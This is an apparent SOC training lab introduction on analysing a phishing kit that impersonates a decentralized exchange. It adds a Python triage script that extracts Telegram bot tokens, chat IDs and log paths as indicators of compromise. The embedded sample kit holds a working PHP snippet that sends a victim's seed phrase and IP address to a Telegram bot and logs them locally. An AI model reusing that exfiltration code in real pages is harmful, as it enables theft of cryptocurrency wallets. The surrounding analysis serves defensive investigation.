Introduction

This lab focuses on analyzing a phishing kit designed to impersonate a decentralized exchange platform in order to steal sensitive cryptocurrency wallet credentials, such as seed phrases. The phishing kit was hosted on a compromised server and includes a variety of files and scripts that provide insight into the attacker’s methods. By dissecting the kit, investigators can uncover the techniques used for data exfiltration, such as real-time transmission of credentials to a Telegram bot, as well as local logging for redundancy.

Through this walkthrough, we will explore the structure of the phishing kit, the functionality of its scripts, and the tools leveraged by the attacker to enhance their campaign’s effectiveness. We will also identify key indicators of compromise (IoCs) and details about the attacker’s online presence, including usernames and associated metadata. This analysis will not only help in understanding the threat actor's tactics but also in building a comprehensive threat intelligence profile.

As we progress, the lab will demonstrate how legitimate services, such as Telegram, can be misused for malicious purposes and how investigators can use the same tools and APIs to uncover critical evidence. The walkthrough serves as an essential exercise for SOC analysts and cybersecurity professionals to enhance their investigative skills in detecting and mitigating phishing threats.
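As an added example (not part of the lab's own materials), the triage pass below scans a constructed phishing-kit source sample for the Telegram bot exfiltration and local-logging patterns the lab describes, and extracts the bot token, chat ID and log path as indicators of compromise; the kit content, token and chat ID are made up here, and the token is redacted for sharing.

```python
import re
from dataclasses import dataclass, field

# Constructed sample kit (hypothetical, not from the lab): a PHP exfil script plus an unrelated page.
SAMPLE_KIT = {
    "send.php": """<?php
$token = "123456789:AAH_EXAMPLE_TOKEN_xxxxxxxxxxxxxxxxx";
$chat_id = "-1001234567890";
$msg = "Seed: " . $_POST['seed'] . " IP: " . $_SERVER['REMOTE_ADDR'];
file_get_contents("https://api.telegram.org/bot$token/sendMessage?chat_id=$chat_id&text=" . urlencode($msg));
file_put_contents("results.txt", $msg . PHP_EOL, FILE_APPEND);
?>""",
    "index.html": "<html><body>Connect wallet</body></html>",
}

# Telegram bot tokens look like "<numeric bot id>:<secret>"; chat IDs are (possibly negative) integers.
TOKEN_RE = re.compile(r"\b(\d{8,10}:[A-Za-z0-9_-]{30,})\b")
CHAT_ID_RE = re.compile(r"chat_id\s*=\s*['\"]?(-?\d{6,})")
API_RE = re.compile(r"api\.telegram\.org/bot")
# Local redundancy log: a literal path written with file_put_contents().
LOCAL_LOG_RE = re.compile(r"file_put_contents\(\s*['\"]([^'\"]+)['\"]")

@dataclass
class KitFindings:
    telegram_files: list = field(default_factory=list)  # files that call the Bot API
    bot_tokens: set = field(default_factory=set)        # raw tokens found in source
    chat_ids: set = field(default_factory=set)          # destination chat IDs
    local_logs: set = field(default_factory=set)        # local log files to collect as evidence

def redact_token(token: str) -> str:
    """Keep the numeric bot id (it identifies the bot) but mask the secret for reports."""
    bot_id, _, secret = token.partition(":")
    return f"{bot_id}:{secret[:4]}...{secret[-4:]}"

def triage_kit(files: dict) -> KitFindings:
    """Walk every file of the kit and collect exfiltration-related indicators."""
    findings = KitFindings()
    for name, content in files.items():
        if API_RE.search(content):
            findings.telegram_files.append(name)
        findings.bot_tokens.update(TOKEN_RE.findall(content))
        findings.chat_ids.update(CHAT_ID_RE.findall(content))
        findings.local_logs.update(LOCAL_LOG_RE.findall(content))
    return findings

if __name__ == "__main__":
    r = triage_kit(SAMPLE_KIT)
    print("Bot API callers:", r.telegram_files)
    print("Bot tokens (redacted):", sorted(redact_token(t) for t in r.bot_tokens))
    print("Chat IDs:", sorted(r.chat_ids), "Local logs:", sorted(r.local_logs))
```

The recovered bot ID and chat ID are the pivot points the lab refers to for profiling the attacker's Telegram presence; the local log paths tell the responder which files on the compromised host hold victim data.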
